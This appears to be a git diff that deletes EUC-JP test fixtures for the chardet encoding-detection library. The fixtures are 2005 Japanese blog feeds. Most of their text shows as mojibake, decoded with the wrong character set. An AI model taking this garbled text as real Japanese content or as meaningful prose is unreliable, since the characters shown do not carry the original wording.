    - - ּ¾¸ֵ²°³¹ֳז¥¥׃ - - 2005-11-17T16:38:45Z - 2005-11-18T01:13:58+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.424 - 2005-11-17T16:13:58Z - ״ֽר₪¥µ¥₪¥ָָ¯¸«¡£ ₪³₪ל₪ע»ָ₪¨₪׀¡¢ֳ¯₪«₪ע°ֶֶג₪¹₪כ₪־₪¬₪ָ₪ֶ₪ג³₪ְ¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - etc - - ״ֽר₪¥µ¥₪¥ָָ¯¸«¡£

    - -

    ₪³₪ל₪ע»ָ₪¨₪׀¡¢ֳ¯₪«₪ע°ֶֶג₪¹₪כ₪־₪¬₪ָ₪ֶ₪ג³₪ְ¡£
    -

    ]]> - -
    -
    - - ¥¹¥ֶ¡¼¥­₪ַ₪¢₪ֳ₪ֶ¥¹¥ֶ¡¼¥­₪ַ₪₪₪ - - 2005-11-17T12:51:25Z - 2005-11-17T21:43:50+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.423 - 2005-11-17T12:43:50Z - ¸רְµ¼ט°ת°ׁ°ק²ס¡¢¥¹¥ֶ¡¼¥­²°¡ײ¥ױ¥©¥כ¥¯¥¹¡׳₪ֲֻ׀₪·₪ֶַ׃½ּ¿־ב¡£ µם₪־ְ®·¿ֶש¡µם₪־ְ¸ֶש¡₪»י¿ֵָש₪ע¿ֽ¹©ֵ×₪ֻ·כֳו₪·¡₪·ֱ¾ץ₪עְ°₪¨₪¿₪ג₪־¡ֻ₪ע¡ײ¥¹¥ֶ¡¼¥­¡׳₪ָ₪·₪ֶַה₪ֳ₪ֶ₪₪₪¿₪½₪¦₪¡£ ₪½₪¦₪₪₪¨₪׀¡¢¥¹¥ֶ¡¼¥­₪־₪¢₪µ₪¯₪₪ֻ₪ג¡¢¡ײ³״ְ¸¥¹¥ֶ¡¼¥­¡׳₪ָ¾־₪·₪¿¡¢»ק₪¿₪ג₪־₪¬₪¢₪ֳ₪¿₪₪¡¡£₪³₪ֳ₪ֱ₪ֿ¥ב¥ֻ¥ו¡¼₪ֻ¹חְ®ֶש₪ֳ₪₪₪₪³₪ָ₪¬½ס₪₪₪ֶ₪¢₪ֳ₪¿₪«₪י₪®₪ך₪®₪ך¥»¡¼¥ױ₪«¡¢₪ָ»׳₪ֳ₪¿₪י¡¦¡¦¡¦ ¡ײ³״ְ¸¥׀¡¼¥°¡׳¡¡¡¡(¥¡¥) ₪₪ף₪ָ¡¢₪₪₪ִ₪־´ײ₪ֻ₪«ּ¾¾־₪¬ׁ₪ן₪ֳ₪ֶ₪₪₪כ¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - etc - - ¸רְµ¼ט°ת°ׁ°ק²ס¡¢¥¹¥ֶ¡¼¥­²°¡ײ¥ױ¥©¥כ¥¯¥¹¡׳₪ֲֻ׀₪·₪ֶַ׃½ּ¿־ב¡£
    -µם₪־ְ®·¿ֶש¡µם₪־ְ¸ֶש¡₪»י¿ֵָש₪ע¿ֽ¹©ֵ×₪ֻ·כֳו₪·¡₪·ֱ¾ץ₪עְ°₪¨₪¿₪ג₪־¡ֻ₪ע¡ײ¥¹¥ֶ¡¼¥­¡׳₪ָ₪·₪ֶַה₪ֳ₪ֶ₪₪₪¿₪½₪¦₪¡£
    -₪½₪¦₪₪₪¨₪׀¡¢¥¹¥ֶ¡¼¥­₪־₪¢₪µ₪¯₪₪ֻ₪ג¡¢¡ײ³״ְ¸¥¹¥ֶ¡¼¥­¡׳₪ָ¾־₪·₪¿¡¢»ק₪¿₪ג₪־₪¬₪¢₪ֳ₪¿₪₪¡¡£₪³₪ֳ₪ֱ₪ֿ¥ב¥ֻ¥ו¡¼₪ֻ¹חְ®ֶש₪ֳ₪₪₪₪³₪ָ₪¬½ס₪₪₪ֶ₪¢₪ֳ₪¿₪«₪י₪®₪ך₪®₪ך¥»¡¼¥ױ₪«¡¢₪ָ»׳₪ֳ₪¿₪י¡¦¡¦¡¦

    - -

    ¡ײ³״ְ¸¥׀¡¼¥°¡׳¡¡¡¡(¥¡¥)

    - -

    ₪₪ף₪ָ¡¢₪₪₪ִ₪־´ײ₪ֻ₪«ּ¾¾־₪¬ׁ₪ן₪ֳ₪ֶ₪₪₪כ¡£
    -

    ]]> - -
    -
    - - ¹גֲ®ֶ»ֿ©µ»½ׁ¥»¥ף¥¿¡¼ - - 2005-10-31T15:45:22Z - 2005-11-01T00:42:27+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.422 - 2005-10-31T15:42:27Z - ¹גֲ®ֶ»ֿ©µ»½ׁ¥»¥ף¥¿¡¼₪ָ₪₪₪¦₪ָ₪³₪ם₪«₪י¡¢₪ן₪׃¾ץ₪¬₪ה₪ֳ₪ֶ₪¯₪כ¡£ ֹץ₪ע³«₪±₪כ₪ָ¡¢ֵלֶֻ¡¿ְ¾ֶֻ¡¿ֳזֶֻ¹גֲ®ֶ»ֿ©²ס¼ׂ₪ָֿ¢ּ¾¡£ ¥¢¥ף¥±¡¼¥ָ¥µ¥₪¥ָ₪ֻ£׃£׃£ּ₪ע₪ִ₪±ֻ÷₪ל₪¿₪³₪ָ₪ֲֻ׀₪¹₪כ₪ן₪׃¾ץ₪ָ₪ָ₪ג₪ֻ¡¢£ׁ£ױ£ֿ¥«¡¼¥ֹ£µ£°£°±¬₪¬ֶ‏₪ֳ₪ֶ₪₪₪¿¡£ ₪ה₪ֳ₪¿₪³₪ָ₪ָֽֿ₪׃ֲִ₪־¥׀¥י¥ף¥¹₪¬¼ט₪ל₪ֶ₪₪₪¿₪־₪ָ¡¢₪ן₪׃¾ץ₪¬ֱב₪«₪ֳ₪¿₪³₪ָ₪«₪י¡¢÷£²ף₪ֹֿװּה₪ֻ½ט₪¹¡¾׀¡ֻ... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - ¹גֲ®ֶ»ֿ©µ»½ׁ¥»¥ף¥¿¡¼₪ָ₪₪₪¦₪ָ₪³₪ם₪«₪י¡¢₪ן₪׃¾ץ₪¬₪ה₪ֳ₪ֶ₪¯₪כ¡£
    -ֹץ₪ע³«₪±₪כ₪ָ¡¢ֵלֶֻ¡¿ְ¾ֶֻ¡¿ֳזֶֻ¹גֲ®ֶ»ֿ©²ס¼ׂ₪ָֿ¢ּ¾¡£
    -¥¢¥ף¥±¡¼¥ָ¥µ¥₪¥ָ₪ֻ£׃£׃£ּ₪ע₪ִ₪±ֻ÷₪ל₪¿₪³₪ָ₪ֲֻ׀₪¹₪כ₪ן₪׃¾ץ₪ָ₪ָ₪ג₪ֻ¡¢£ׁ£ױ£ֿ¥«¡¼¥ֹ£µ£°£°±¬₪¬ֶ‏₪ֳ₪ֶ₪₪₪¿¡£
    -₪ה₪ֳ₪¿₪³₪ָ₪ָֽֿ₪׃ֲִ₪־¥׀¥י¥ף¥¹₪¬¼ט₪ל₪ֶ₪₪₪¿₪־₪ָ¡¢₪ן₪׃¾ץ₪¬ֱב₪«₪ֳ₪¿₪³₪ָ₪«₪י¡¢÷£²ף₪ֹֿװּה₪ֻ½ט₪¹¡¾׀¡ֻ

    ]]> - -
    -
    - - ֲחµ¬ּֿ²‏ֲ₪ - - 2005-10-27T17:48:14Z - 2005-10-28T02:46:13+09:00 - tag:www.ycf.nanet.co.jp,2005:/~dre/cgi-bin/diary//1.421 - 2005-10-27T17:46:13Z - £ִ£ֹ£ֿ£־₪ֻ»ִ₪ֳ₪ֶ₪₪₪¿¥¡¼¥¸₪ע¡¢°ל³ח÷ן½₪·₪₪·₪¿¡£ £±¥צ·מ₪₪ֹ₪ֵֿ¾ֱקְִך₪·₪ֶ₪¢₪ך₪₪¹₪¬¡¢ֵ¾ֱק₪¬ֽמ₪ֱֳו₪₪₪¿»‏ְֵ₪ַ£ִ£ֹ£ֿ£־₪־¥¡¼¥¸₪ֵֿ±ֲאֽ½ִך₪ַ₪¹¡£... - - AND0 - http://www1.ocn.ne.jp/~t.ando/ - dre@ycf.nanet.co.jp - - »הֵ×ֶµ­ - - £ִ£ֹ£ֿ£־₪ֻ»ִ₪ֳ₪ֶ₪₪₪¿¥¡¼¥¸₪ע¡¢°ל³ח÷ן½₪·₪₪·₪¿¡£
    -£±¥צ·מ₪₪ֹ₪ֵֿ¾ֱקְִך₪·₪ֶ₪¢₪ך₪₪¹₪¬¡¢ֵ¾ֱק₪¬ֽמ₪ֱֳו₪₪₪¿»‏ְֵ₪ַ£ִ£ֹ£ֿ£־₪־¥¡¼¥¸₪ֵֿ±ֲאֽ½ִך₪ַ₪¹¡£

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/azito.under.jp.xml b/chardet/tests/EUC-JP/azito.under.jp.xml deleted file mode 100644 index 2530e4b..0000000 --- a/chardet/tests/EUC-JP/azito.under.jp.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -AZITO[´נֳֿ] -http://azito.under.jp/blog/azito/ -¡ֱ¡¡¥¢¥¸¥ָ¡¡¡ֱ¡¡ -ja - -2006-01-02T01:47:44+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -₪´ֽט¸ק₪עַׂ₪₪ֻ -http://azito.under.jp/cgi/mt/archives/azito/000855.html - ÷£ַ¯₪־ַ¯±₪·₪ֿ₪´ֽט¸ק₪עַׂ₪₪ֹֻ»־₪עּ»״₪·₪¿¡£ ·ט₪·₪ֶֶ₪־½׀ֻ½ֱצ₪ַ₪ֿ₪₪₪¡×¡× ₪´... -08_ֶ¾ן¥ֽ¥¿ -azito -2006-01-02T01:47:44+09:00 - - -₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦ -http://azito.under.jp/cgi/mt/archives/azito/000853.html - ÷£ַ¯₪ג₪ט₪ם₪·₪¯¢צ ... -08_ֶ¾ן¥ֽ¥¿ -azito -2006-01-01T00:00:59+09:00 - - -AZITOֵ×2005ַ¯ֱם³ח -http://azito.under.jp/cgi/mt/archives/azito/000854.html -2005ַ¯₪גֱב₪₪₪ג₪־₪ַ÷£ֶ₪ַ÷ַ¸ו¡£ °לַ¯₪עִש₪ב₪¯₪¯₪כ¾ו₪ַ¡¢ ¡ײֳֻ÷׳¡׳₪ע¸«₪₪¬₪י₪־... -00_₪×´ך₪₪¡¦₪×ֳ־₪י₪» -azito -2005-12-31T20:44:21+09:00 - - -¥ג¥ֱ¥ג¥ֱ₪₪ֳ₪¿₪ף -http://azito.under.jp/cgi/mt/archives/azito/000852.html -₪¦₪ֱ₪־ֳֿ‎₪ַ₪ֿ12·מ29ֶ₪ֻ₪ּֿ₪ע₪ִ₪«₪₪₪₪י₪·₪₪¡£ ₪₪¼₪«₪ָ₪₪₪¦₪ָ¡ײ¶ל¡9¡ֻּ¡׳... -08_ֶ¾ן¥ֽ¥¿ -azito -2005-12-30T22:56:48+09:00 - - -½י₪ב₪ֶ₪־»¶ג -http://azito.under.jp/cgi/mt/archives/azito/000851.html -11·מ₪ֻ²ז₪¬²ָ₪ֻ₪ה₪ֳ₪ֶ₪­₪¿¥ׁ¥°¡£ 2005/11/08¡¡¡ײ¿·₪·₪₪²ֲָ²¡׳ ¡ײ₪×₪ָ₪ב... -07_¥¢¥ֻ¥¥כ -azito -2005-12-28T23:59:59+09:00 - - -¡»פ₪₪¼ח¡ֲּ₪₪¸₪¡ּµ»צָ¯¸«¡ -http://azito.under.jp/cgi/mt/archives/azito/000850.html -÷עֶ½ס₪­₪₪·₪¿µ­»צ₪־¥ׁ¥°¡£ »פ₪₪¼ח₪־‎₪¬ּµ»צ₪ֻ¸«₪ִ₪«₪ך₪₪·₪¿₪־₪ַ₪´ף¹נ₪µ₪»₪ִֶ÷₪­... -07_¥¢¥ֻ¥¥כ -azito -2005-12-21T23:48:05+09:00 - - -¡¿¿²¬¡ֲּ₪₪¸₪¡¥ׁ¥°¡ -http://azito.under.jp/cgi/mt/archives/azito/000849.html -ֽ§¿ֽ₪«₪יֲּ₪₪¸₪₪ע¸מ₪·₪¿₪ָ₪־ֿ¢ֽם₪¬ֶ‏₪ך₪₪·₪¿¡£ ¿´ֵצ₪¿₪ך₪־‎₪¬₪₪₪₪·₪¿₪י₪´°לף²¼... -07_¥¢¥ֻ¥¥כ -azito -2005-12-20T23:58:33+09:00 - - -ֵ₪ָ₪«₪½₪¦₪₪₪¦₪־´״·¸₪₪₪ -http://azito.under.jp/cgi/mt/archives/azito/000848.html -´כ²ט₪¬·ט₪₪ֳ₪¿₪־₪ֿ£±£±·מ¡£ ּµֵֻ₪ֻ₪ג¡ײ£±£²·מ₪ֻ₪·₪ט₪¦₪¼¡׳₪ָ₪₪₪¦ֳֿ¡£ ₪­₪ֱ₪ף₪ָ¼ֲ¹װ... -16_¥­¥ד¥ף¥׳ -azito -2005-12-19T21:37:47+09:00 - - -M-1GP2005·ט¾¡¿½׀¼װ½׀ֲ·₪¦ -http://azito.under.jp/cgi/mt/archives/azito/000847.html -³₪·₪₪ֻ₪·₪ֶ₪₪₪¿M-1₪־·ט¾¡¿½׀¥³¥ף¥׃8ֱָ₪¬½׀ֲ·₪ֳ₪¿₪ט₪¦₪ְ¡£ ¡ת¡¡¾׀₪₪ָ׃¡¡¡µָֻ... -06_¥ֶ¥ל¥׃₪ֳ»ׂ -azito -2005-12-16T00:25:22+09:00 - - -ֲח¾זֹ׳¡£DTI -http://azito.under.jp/cgi/mt/archives/azito/000846.html -₪ֽ₪§¡ֱ₪₪ף₪₪ֿ¡ײ₪³₪ֻ₪¿₪ף¡¾®ְ¾¿¿ֶאָ‏¡ֻ¡׳¹¥₪­¡© ¥×¥ל¹¥₪­¡ֱ¡¥¡¥¡¥(¡­§©¡®)ֱׯ... -04_µ₪₪ֻ₪₪כ¥µ¥₪¥ָ¾ׂ²נ -azito -2005-12-15T02:33:20+09:00 - - -¥ײ¥ם¥°ֹבµ°ׁ°ק²ס₪ֻ»²²ֳ -http://azito.under.jp/cgi/mt/archives/azito/000845.html -½ק²¦¡ײגֳֶי₪«₪×₪ך¡׳₪µ₪ף₪¬°ׁ°קִ¹₪עּ³₪ב₪כ¥ײ¥ם¥°ֹבµ°ׁ°ק²ס¡£ ְµִ¾¡¢NIFTY₪ֳ₪ֶ²ס... -04_µ₪₪ֻ₪₪כ¥µ¥₪¥ָ¾ׂ²נ -azito -2005-12-15T02:08:47+09:00 - - -¥׳¥ֱ¡¦¥ך¥ֻ¥ו¡¼¥¢¥כ¡£±£¸¡ֻ -http://azito.under.jp/cgi/mt/archives/azito/000844.html -¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳₪עµ¡₪ֻ¡¢₪₪₪ם₪₪₪םֿ®₪ֳ₪ֶ₪₪₪·₪¿¡£ ׁ¹¹ְֵ₪ֿ°²¼¡£ ¢£¡ײinfo¥... -00_₪×´ך₪₪¡¦₪×ֳ־₪י₪» -azito -2005-12-14T23:59:59+09:00 - - -MT3.2-ja-2₪ֻ¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳ -http://azito.under.jp/cgi/mt/archives/azito/000843.html -2ַ¯ֱ°₪«₪י»ָֽׁ₪·₪ֶ₪₪₪כMovableType₪ע¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳₪·₪₪·₪¿¡£ Mov... -00_₪×´ך₪₪¡¦₪×ֳ־₪י₪» -azito -2005-12-13T18:22:39+09:00 - - -TEST -http://azito.under.jp/cgi/mt/archives/azito/000842.html -TEST... -00_₪×´ך₪₪¡¦₪×ֳ־₪י₪» -azito -2005-12-12T23:31:05+09:00 - - -MT¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳ -http://azito.under.jp/cgi/mt/archives/azito/000841.html -ְטִר¡¢¥׀¡¼¥¸¥ח¥ף¥¢¥ֳ¥׳¼÷ַװ₪־µ­»צ₪ע½ס₪­₪₪·₪¿₪¬¡¢ ₪ה₪ֿ₪ך¡¢¥¹¥ׁ¥אֲ׀÷צ₪ֻ₪ֿ¥׀¡¼¥¸¥ח... -00_₪×´ך₪₪¡¦₪×ֳ־₪י₪» -azito -2005-12-12T18:19:15+09:00 - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/azoz.org.xml b/chardet/tests/EUC-JP/azoz.org.xml deleted file mode 100644 index ef5c4e2..0000000 --- a/chardet/tests/EUC-JP/azoz.org.xml +++ /dev/null @@ -1,198 +0,0 @@ - - - - - -AZOZ -http://azoz.org/ - -en_us - -2005-12-29T16:32:10+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -¥ם¥¦¥½¥¯₪ָ´ײ°ד₪¨²ײ²׀₪ְֵֻ²׀¡¢»״£´ֻ₪ע¼÷₪¦ -http://azoz.org/archives/200512291632.php -05122901.jpg¡־ֶ¥ױ¥ם¥ך¥ְ½£¡ֿ¡¡¾ֳֵֹֻצ¶ֹ₪¬ָ¯ֹ½₪·₪¿₪ָ₪³₪ם₪ֻ₪ט₪כ₪ָ¡¢ֶ±½£¥¿¥ף¥ׁ÷½»₪־½קְ­¡48÷׀¡ֻ₪¬¥ם¥¦¥½¥¯₪ֻ²׀₪ע₪ִ₪±₪ט₪¦₪ָ₪·₪¿₪ָ₪³₪ם¡¢¸ם₪ֳ₪ֶ²ײ²׀₪ְֵֻ²׀₪·₪ֶ₪·₪₪₪¡¢£´ֻ₪־»״₪ע¼÷₪¦»צ·ן₪¬ָ¯ְ¸₪·₪¿¡£

    - -

    »צ·ןָ¯ְ¸ֵצ»‏¡¢₪³₪־ֳֿ°ט₪ַ₪ֿ¿וֿ³₪ל₪¬¸¶°ר₪ִַהֵֵ¾ץֲײ₪ְ₪ֳ₪¿₪¿₪ב¡¢₪³₪־½קְ­₪ְּֿ₪«₪ך₪עְֶ₪ט₪¦₪ָ¼ךֳµ₪ך₪ַ¥ם¥¦¥½¥¯₪עֳµ₪·₪ֶ₪₪₪¿₪ָ₪₪₪¦¡£₪ט₪¦₪ה₪¯¥ם¥¦¥½¥¯₪ָ»׳₪ן₪ל₪כ×₪עָ¯¸«₪·₪¿ָא½ק₪ֿ¡¢½½¬₪ֻ³־ַ§₪¹₪כ₪³₪ָ₪₪¯₪½₪ל₪ֻ²׀₪ע₪ִ₪±₪ֶ₪·₪₪ֳ₪¿¡£

    ]]>
    -MISTAKE -eizo -2005-12-29T16:32:10+09:00 -
    - -־ר¿ֶֽ±»־₪־¸‎ְֿ¡¢ָא½ק₪¬·ֲָ׃ֳֵֵֿ₪ע°₪¹‏₪ף₪ַ½×־» -http://azoz.org/archives/200512241719.php -05122401.jpg¡־ֶ¥¥÷¡¼¥ך½£¡¦¥ײ¥כ¡¼¥¹¥׳¥ך¥ף¥°¥¹¡ֿ¡¡·ֲָ׃ֳֵֵֿ₪¬־ר¿ֶֽ±»־₪־¸‎₪²₪ף₪«₪ע¥¹¥ָ¥ֳ¥׳₪µ₪»₪כ₪³₪ָ₪ֻ₪₪ֳ₪¿¡£¸‎ְֿ₪־÷ֳַז₪ָֻא½ק₪¬·ֲָ׃ֳֵֵֿ₪ע´₪´₪ָ°₪¹‏₪¡¢¸ֶµ÷₪ֶס₪ֻ´₪ֳ₪ֲֶֹ±¡₪״±¿₪׀₪ל₪ֶ₪·₪₪ֳ₪¿₪«₪י₪ְ¡£

    - -

    ֵצ¶ֹ₪־ָ¯ֹ½₪ֻ₪ט₪כ₪ָ¡¢¶גֶֻֽ₪־¸בֱ°4»‏52¬÷¢₪ְֳֻֻ­₪«₪י¡ײָא½ק₪¬¸ֶµ÷₪ֶס₪ֻ₪₪ֳ₪ֶ₪·₪₪ֳ₪¿¡׳₪ָ₪־ִּף₪¬₪¢₪ך¡¢¶מ₪±₪ִ₪±₪ֶ₪₪כ₪ָ¡¢¶ל₪·₪ף₪ַ₪₪₪כ½קְ­¡24÷׀¡ֻ₪־¹¢₪ֻ·ֲָ׃ֳֵֵֿ₪¬µֽ₪₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪¬¬₪«₪ֳ₪¿₪ָ₪₪₪¦¡£

    ]]>
    -SAD -eizo -2005-12-24T17:19:27+09:00 -
    - -¥ָ¥₪¥ל₪עּף20¬´ײ¡¢־®₪·₪₪¯₪ֳ₪ֶ₪¯₪ל₪כ¥¥י¥ף¥ֶ¥£¥¢ח½¸ֳז -http://azoz.org/archives/200512221304.php -05122201.jpg¡־ֶ¥כ¥₪¥¸¥¢¥½£¡¦¥י¥ױ¥¡¥₪¥¨¥ֳ¥ָ¡ֿ¡¡ֶ±½£₪ֻ₪¢₪כֲ¿ֵּ×¶¥µ»¾ל¡ײCajundome¡׳₪ַ₪ֿ¡¢¡ײ¥ָ¥₪¥ל₪ע־®₪·₪₪¯₪כ¥₪¥¥ף¥ָ¡׳₪¬12·מ27ֶ¡¢¸ב¸ו6»‏₪ֻ¥¹¥¿¡¼¥ָ₪¹₪כֽ½ִך₪ָ₪₪ֳ₪ֶ₪₪₪כ¡£₪³₪־₪¿₪ב¡¢´ֹֽ‎¼װֲ¦₪¬¥ֹ¡¼¥אֶג₪ֻ200°¾ו₪¢₪כ¥ָ¥₪¥ל₪־¿ו₪ע־®₪·₪ֶ₪¯₪ל₪כ¥¥י¥ף¥ֶ¥£¥¢₪עּף70ּ¾ח½¸₪·₪ֶ₪₪₪כ¡£

    - -

    ¡ײCajundome¡׳₪ֿ¡¢¥ֿ¥ך¥±¡¼¥ף¡ײ¥«¥ָ¥ך¡¼¥¡׳¡ײ¥ך¥¿¡׳₪«₪יָעֶס₪·₪ֶ₪­₪¿¿ֽ¡¹ּף17,000¿ֽ₪¬10·מ26ֶ₪₪ַ58ֶ´ײ₪ֵֻֿ₪ֳ₪ֲֶ÷₪·₪ֶ₪₪₪¿¾ל½ך¡£₪½₪־·כ²ּ¡¢ֿ¢ֶµ₪₪₪¯¡ײ¹ף»ָ¡׳₪µ₪ל₪¿¥ֹ¡¼¥א₪־²¼¿ו´ֹ¥·¥¹¥ֶ¥א₪ֻּהֲך₪¬ְ¸₪¸₪¿₪ָ₪₪₪¦¡£

    ]]>
    -FUN -eizo -2005-12-22T13:04:56+09:00 -
    - -ָ³¶גֲו₪עֳײ₪₪₪ֶµמ₪כ¡¢ֶז₪־¡ײ¥ׁ¡¼¥­¥ף¥°¥ֱ¥±¥ֳ¥ָ¡¦¥µ¥ף¥¿¡׳¸½₪כ -http://azoz.org/archives/200512211426.php -05122101.jpg¡־±ׁ¹ס¡ֿ¡¡ֳף¼ײ°דָ¿₪־ְֹה₪עְ₪י₪ל₪¿¥₪¥®¥ך¥¹₪־¥ֹ¥י¥₪¥׀¡¼ֳ£₪¬¡¢¥¯¥ך¥¹¥¥¹»‏´₪ֶֻז₪־¥µ¥ף¥¿₪«₪י»׳₪ן₪ּ¥׳¥ל¥¼¥ף¥ָ₪ע¼ץ₪±¼ט₪ֳ₪ֶ₪₪₪כ¡£¡ײ¥ׁ¡¼¥­¥ף¥°¥ֱ¥±¥ֳ¥ָ¡¦¥µ¥ף¥¿¡׳₪¬¥׳¥ל¥¼¥ף¥ָ₪ָ₪·₪ֶ¡ײָ³¶גֲו¡׳₪עֳײ₪₪₪ֶ₪₪₪ֳ₪ֶ₪¯₪ל₪כ₪«₪י₪ְ¡£

    - -

    ¡ײ¥ׁ¡¼¥­¥ף¥°¥ֱ¥±¥ֳ¥ָ¡ֳף¼ײ°דָ¿ְֹה¡ֻ¡¦¥µ¥ף¥¿¡׳₪עּ¾¾ט₪כ¿ֽ×₪־ְµֲ־₪ֿ÷£₪־₪ָ₪³₪םֹװְּ¡£₪³₪־¥µ¥ף¥¿¡¢°דָ¿ְֹה₪¬ֳײ₪«₪ל₪ֶ₪₪₪כ¼ײ₪עָ¯¸«₪¹₪כ₪ָ¡¢ָ³¶גֲו30¥¥ף¥ֹ¡¸½¶ג¡ֻ₪ָ¡¢¥ב¥ֳ¥»¡¼¥¸₪¬½ס₪«₪ל₪¿¥«¡¼¥ֹ₪ע¥ן¥₪¥ׁ¡¼₪ֻ¶´₪ף₪ַ»ִ₪·₪ֶ₪₪₪¯₪ָ₪₪₪¦¡£

    ]]>
    -SPIFFY -eizo -2005-12-21T14:26:25+09:00 -
    - -°¦¸₪¡ײ¥·¥¯¥¹¥ֶ¥£¡׳¡¢ֵֵ¼ײ₪ֻ¾ט₪ֳ₪ֶ¼«ֲנ¥¢¥ׁ¡¼¥ָ₪ֻµ¢₪כ -http://azoz.org/archives/200512201639.php -05122001.jpg¡־¥¹¥¥₪¥ף¡ֿ¡¡¥׀¥כ¥»¥ם¥₪ֻ½»₪ף₪ַ₪₪₪כְֳֻ­₪¬¡¢¥ַ¡¼¥ָ₪ַ¾¯₪·₪־´ײִ®₪ע־¥₪ל₪כ₪³₪ָ₪ֻ₪₪ך¡¢»פ₪ֳ₪ֶ₪₪₪¿¸₪₪ע¼«ֲנ¥¢¥ׁ¡¼¥ָ₪«₪יּף20¥­¥ם־¥₪ל₪¿¿ְֶּ₪־²ָ₪ֲֻֽ₪±₪ֶ₪₪₪ֳ₪¿₪ָ₪³₪ם¡¢°¦¸₪₪¬ֵֵ¼ײ₪ֻ¾ט₪ֳ₪ֶ¥¢¥ׁ¡¼¥ָ₪״µ¢₪כ₪ָ₪₪₪¦»צ·ן₪¬ָ¯ְ¸₪·₪¿¡£

    - -

    »פ₪₪¼ח₪ַ₪¢₪כ¥ְ¥¥¹¡¦¥ָ¡¼¥ל¥¹»ב₪ֿ¡¢¥׀¥כ¥»¥ם¥¹³°₪ֻ½»₪אµֱֽ‎₪־»׀ֲנ₪עֻ¬₪ל₪כ₪ָ₪­¡¢₪₪₪ִ₪ג£´÷׀₪־°¦¸₪¡ײ¥·¥¯¥¹¥ֶ¥£¡»ף¡ֻ¡׳₪ָ°ל½ן₪ֵֵֻ¼ײ₪ֻ¾ט₪ֳ₪ֶֽ·₪׃₪ֻ¹װ₪ֳ₪ֶ₪₪₪¿¡£₪³₪־₪¿₪ב¡¢¥·¥¯¥¹¥ֶ¥£₪¬ֵֵ¼ײ₪ֻ¾ט₪כ₪³₪ָ₪ע³׀₪¨₪ֶ₪₪₪¿₪ָ¹ֽ₪¨₪י₪ל₪ֶ₪₪₪כ¡£¡½¡½ ÷£ַ¯12·מ6ֶ¡¢¥ָ¡¼¥ל¥¹»ב₪ֿ¥¬¡¼¥כ¥ױ¥ל¥ף¥ֹ₪ָ³°½׀₪¹₪כֽ½ִך₪ֻ₪₪ֳ₪ֶ₪₪₪¿₪ָ₪₪₪¦¡£

    ]]>
    -SPIFFY -eizo -2005-12-20T16:39:02+09:00 -
    - -ֹ׳₪ֻ²ס₪¨₪₪₪¡ִ¼ה₪·₪¹₪®₪ֶ¡ײֹ׳₪ֻ₪½₪ֳ₪¯₪ך₪¥¥ֽ¥­¥ף¡׳₪ְָ¸³ט₪¹₪כ÷ -http://azoz.org/archives/200512131119.php -05121301.jpg¡־ֶ¥¸¥ח¡¼¥¸¥¢½£¡¦¥­¥ף¥°¥¹¥י¥ף¥ֹ¡ֿ¡¡¥¹¡¼¥¸¡¼¡¦¥¦¥©¡¼¥«¡¼₪µ₪ף₪ֹֿ׳₪ֻ₪½₪ֳ₪¯₪ך₪¥¥ֽ¥­¥ף₪ָ°ל½ן₪ְֻ¸³ט₪ע₪·₪ֶ₪₪₪כ¡£₪₪¼₪₪י¡¢ֹ׳₪¬ְֶר¿ו´ֿ¡״¥¦¥¨¥¹¥ָ¡¦¥׀¡¼¥¸¥ֻ¥¢¡₪־¾טֱָ°ק₪ַ₪¢₪כ₪¿₪ב¡¢°לֵ²ָ₪ע½׀₪ֶ¹װ₪¯₪ִָ¹´´ײ²ס₪¨₪÷¡¢£±¿ֽ₪ַ₪ֿ¼ה₪·₪₪₪«₪י₪ְ₪ָ₪₪₪¦¡£

    - -

    ¿·÷§ְ¸³ט₪ַ÷ַ½י₪־¡ײּ₪ל¡׳₪ע·׀¸³₪·₪¿ָא½ק₪ֿ¡¢¼ה₪·₪µ₪ע¶₪י₪ן₪¹₪¿₪ב²¿₪«־ֹ₪₪‎ֻ¡₪ֿ₪₪₪₪«₪ָ¹ֽ₪¨₪ֶ₪₪₪¿₪ָ₪³₪ם¡¢¥×¡¼¥¯¥·¥ח¥ף¥µ¥₪¥ָ¡ײ¥₪¡¼¥¥₪¡׳₪ֻ¿ו¼₪־¥¥ֽ¥­¥ף₪¬½׀ֹ₪µ₪ל₪ֶ₪₪₪כ₪־₪עָ¯¸«¡£¥¹¡¼¥¸¡¼₪µ₪ף₪ֿ¡¢¸«»צ₪³₪־¥¥ֽ¥­¥ף₪ע200¥ֹ¥כ₪ַֽמ»¥₪·₪¿¡£

    ]]>
    -FUN -eizo -2005-12-13T11:19:02+09:00 -
